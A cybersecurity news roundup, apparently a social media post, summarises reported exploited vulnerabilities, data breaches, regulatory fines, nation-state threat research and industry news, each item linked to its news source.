- Microsoft is expanding its Purview Data Loss Prevention (DLP) controls for Microsoft 365 Copilot to block the processing of confidential Word, Excel, and PowerPoint documents across all storage locations, including local files. This enhancement aims to provide consistent protection and addresses previous bugs where Copilot could summarise protected emails.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/microsoft/microsoft-adds-copilot-data-controls-to-all-storage-locations/

Regulatory Issues or Changes ⚖️

- The UK Information Commissioner's Office (ICO) has fined Reddit £14.47 million (over $19.5 million) for unlawfully processing children's data. Reddit failed to implement adequate age assurance mechanisms until July 2025, despite its own terms of service prohibiting users under 13. Reddit plans to appeal the decision.
- Senior Ukrainian officials are pushing for tighter regulation of the messaging app Telegram, citing its frequent use by Russia for recruiting individuals for sabotage and terrorist attacks, as well as for spreading disinformation.

🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/24/uk_data_watchdog_fines_reddit_1447m_for_letting_kids_slip_past_the_gate/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/uk-fines-reddit-19-million-for-using-childrens-data-unlawfully/
🗞️ The Record | https://therecord.media/ukraine-telegram-regulation-russia-sabotage-recruitment

Everything Else ⚙️

- Go library maintainer Filippo Valsorda criticised GitHub's Dependabot, labelling it a "noise machine" for generating excessive false positives and "nonsensical" CVSS scores. He argues this leads to alert fatigue and reduces security effectiveness, recommending static analysis tools like `govulncheck` instead.

🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/24/github_dependabot_noise_machine/

#CyberSecurity #ThreatIntelligence #Ransomware #NationState #APT #DataBreach #Vulnerability #RCE #AI #DataPrivacy #InfoSec #CyberAttack #Malware #IncidentResponse #Hacktivism #FinancialCrime #RegulatoryCompliance

It's been a busy 24 hours in the cyber world with significant updates on actively exploited vulnerabilities, recent data breaches, and a deep dive into evolving nation-state tactics. Let's take a look:

Actively Exploited Vulnerabilities & Zero-Days ⚠️

- A critical pre-authentication RCE (CVE-2026-1731, CVSS 9.9) in BeyondTrust Remote Support and Privileged Remote Access appliances is now being actively exploited. Attackers are using specially crafted client requests to extract `x-ns-company` values and establish WebSocket channels for command execution. On-premise customers must patch immediately.
- A critical SQL injection vulnerability (CVE-2024-43468, CVSS 9.8) in Microsoft Configuration Manager, patched in October 2024, is now under active exploitation. This allows unauthenticated remote attackers to execute commands on the server or underlying database. CISA has added it to their KEV catalog, urging federal agencies to patch by March 5th.
- Apple has disclosed its first actively exploited zero-day of 2026, a memory corruption flaw (CVE-2026-20700) in `dyld` affecting iPhones and iPads running iOS versions prior to 26. This vulnerability was used in "extremely sophisticated attacks against specific targeted individuals," likely for commercial spyware.
- Two critical RCE vulnerabilities (CVE-2026-1281, CVE-2026-1340, CVSS 9.8) in Ivanti Endpoint Manager Mobile (EPMM) are being actively exploited, leading to compromises of several European government agencies, including the European Commission and Dutch and Finnish governments. This highlights the ongoing challenge of securing widely deployed edge devices.
- CISA also added CVE-2025-15556 (Notepad++ download integrity bypass) and CVE-2025-40536 (SolarWinds Web Help Desk security control bypass) to its KEV catalog. The Notepad++ flaw was exploited by the China-linked Lotus Blossom APT to deliver the Chrysalis backdoor via trojanised installers, targeting specific high-value individuals.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/critical-beyondtrust-rce-flaw-now-exploited-in-attacks-patch-now/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/13/critical_microsoft_bug_from_2024/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/cisa-flags-microsoft-configmgr-rce-flaw-as-exploited-in-attacks/
🤫 CyberScoop | https://cyberscoop.com/apple-zero-day-vulnerability-cve-2026-20700/
📰 The Hacker News | https://thehackernews.com/2026/02/researchers-observe-in-wild.html
👻 Dark Reading | https://www.darkreading.com/endpoint-security/ivanti-epmm-zero-day-bugs-exploit

Recent Cyber Attacks & Breaches 🚨

- Louis Vuitton, Christian Dior Couture, and Tiffany have been collectively fined $25 million by South Korea for inadequate security leading to data exposure for over 5.5 million customers. Breaches stemmed from malware on an employee device and phishing attacks compromising a shared cloud-based customer management service.
- The Netherlands' largest mobile network operator, Odido, disclosed a breach of its customer contact system affecting approximately 6.2 million people. Stolen data includes names, addresses, phone numbers, dates of birth, bank account numbers, and ID document details, prompting warnings about potential impersonation and phishing scams.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/louis-vuitton-dior-and-tiffany-fined-25-million-over-data-breaches/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/13/odido_breach/

New Threat Research & Techniques 🔬

- Google's Threat Intelligence Group (GTIG) has attributed a previously undocumented, possibly Russian intelligence-affiliated threat actor to attacks on Ukrainian defense, military, government, and energy organisations using CANFAIL malware. This group is noted for using Large Language Models (LLMs) for reconnaissance, lure creation, and basic technical questions for C2 setup.
- Threat actors are leveraging Claude LLM artifacts and Google Ads in "ClickFix" campaigns to deliver Mac infostealer malware. Malicious search results lead users to public Claude guides or fake Apple Support pages instructing them to execute shell commands in Terminal, which fetches the MacSync infostealer to exfiltrate sensitive system data.
- Nation-state actors, particularly China and Russia, are aggressively targeting the Defense Industrial Base (DIB), employing zero-day exploits against edge devices (VPNs, security gateways) for initial access and "pre-positioning" in networks. This strategy aims for persistent intelligence collection during peacetime and disruption options during crises, with a focus on devices often slower to patch and less monitored.
- Microsoft faces increasing pressure over Bring-Your-Own-Vulnerable-Driver (BYOVD) attacks, where threat actors exploit legitimate, but vulnerable, drivers to disable security products with kernel-level access. Despite Microsoft's efforts, gaps exist, such as allowing drivers with revoked certificates, and slow blocklist updates, making it a persistent challenge for defenders.
- A security researcher demonstrated multiple techniques to manipulate Windows LNK shortcut files, allowing attackers to display a benign target in file properties while executing a malicious payload. Microsoft's Security Response Center declined to classify these as vulnerabilities, citing user interaction, despite historical exploitation of similar LNK flaws.
- npm has overhauled its authentication, revoking classic tokens and defaulting to short-lived, session-based tokens with MFA for publishing, and encouraging OIDC Trusted Publishing. While a significant step, risks remain as MFA phishing can still yield short-lived tokens, and optional MFA bypass for 90-day tokens leaves a vulnerability similar to previous classic tokens.

📰 The Hacker News | https://thehackernews.com/2026/02/google-ties-suspected-russian-actor-to.html
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/claude-llm-artifacts-abused-to-push-mac-infostealers-in-clickfix-attack/
👻 Dark Reading | https://www.darkreading.com/cyber-risk/nation-state-hackers-defense-industrial-base-under-siege
👻 Dark Reading | https://www.darkreading.com/application-security/microsoft-under-pressure-defenses-byovd-attacks
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/microsoft/microsoft-new-windows-lnk-spoofing-issues-arent-vulnerabilities/
📰 The Hacker News | https://thehackernews.com/2026/02/npms-update-to-harden-their-supply.html

Threat Landscape & Geopolitics 🌍

- Estonia's foreign intelligence chief urged European governments and industry to invest in homegrown offensive cyber capabilities, arguing that Europe is too reliant on non-European tools and needs to match adversaries' ability to penetrate, disrupt, or manipulate digital systems.
- Taiwan warns that China may be rehearsing a "digital siege" using platforms like "Expedition Cloud" to simulate attacks on critical infrastructure. This suggests a shift from espionage to disruption, with Taiwan serving as a proving ground for new, aggressive cyber tactics.
- NATO's deputy secretary general stated that the alliance must be ready to impose costs on Russia and China for cyber and hybrid attacks, which increasingly target critical infrastructure and government services. This includes strengthening defense, boosting innovation, and integrating military, civilian, and industry efforts.
- The EU's top tech official warned that Europe can no longer be "naive" about adversaries' ability to shut down critical infrastructure. She called for tougher rules, more investment, and phasing out high-risk suppliers (like Huawei/ZTE) to protect against coordinated cyber and physical threats.
- Officials and executives at the Munich Cyber Security Conference highlighted space as the next arena of great power competition, vulnerable to disruption. Concerns include the reliance of modern life on satellites and the vulnerability of subsea cables, with calls for independent "outernet" satellite networks to ensure resilience.
- Sweden's Ministry of Defence states that cyber and hybrid threats are now a permanent feature of Europe's security environment. Societies must be built to function under sustained pressure, rather than assuming disruptions are rare, emphasising a "total defense" concept with strong public-private cooperation.

🗞️ The Record | https://therecord.media/estonia-spy-chief-calls-on-europe-to-invest-in-own-offense
🗞️ The Record | https://therecord.media/china-taiwan-digital-siege-munich
🗞️ The Record | https://therecord.media/nato-must-impost-costs-russia-china-cyber-hybrid-deputy-secretary
🗞️ The Record | https://therecord.media/eu-cyber-critical-infrastructure-tech
🗞️ The Record | https://therecord.media/space-cybersecurity-new-front-war
🗞️ The Record | https://therecord.media/sweden-cyber-threats-europe-permanent

Regulatory & Communication Blockades 🔒

- The Russian government is intensifying its crackdown on communication platforms outside its control, attempting to fully block WhatsApp and aggressively throttling Telegram. This move aims to encourage citizens to use the Kremlin-controlled MAX messenger app, which has raised privacy concerns.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/russia-tries-to-block-whatsapp-telegram-in-communication-blockade/

Industry News / Acquisitions 🤝

- Proofpoint has acquired AI security startup Acuvity to address the growing security risks associated with widespread corporate adoption of agentic AI. This move aims to strengthen Proofpoint's capabilities in monitoring and securing AI-powered systems, tackling new attack vectors like prompt injection and model manipulation.

🤫 CyberScoop | https://cyberscoop.com/proofpoint-acuvity-deal-agentic-ai-security/

#CyberSecurity #ThreatIntelligence #Vulnerabilities #ZeroDay #RCE #DataBreach #NationState #APT #Malware #AI #LLM #SupplyChainSecurity #CriticalInfrastructure #Geopolitics #InfoSec #CyberAttack #IncidentResponse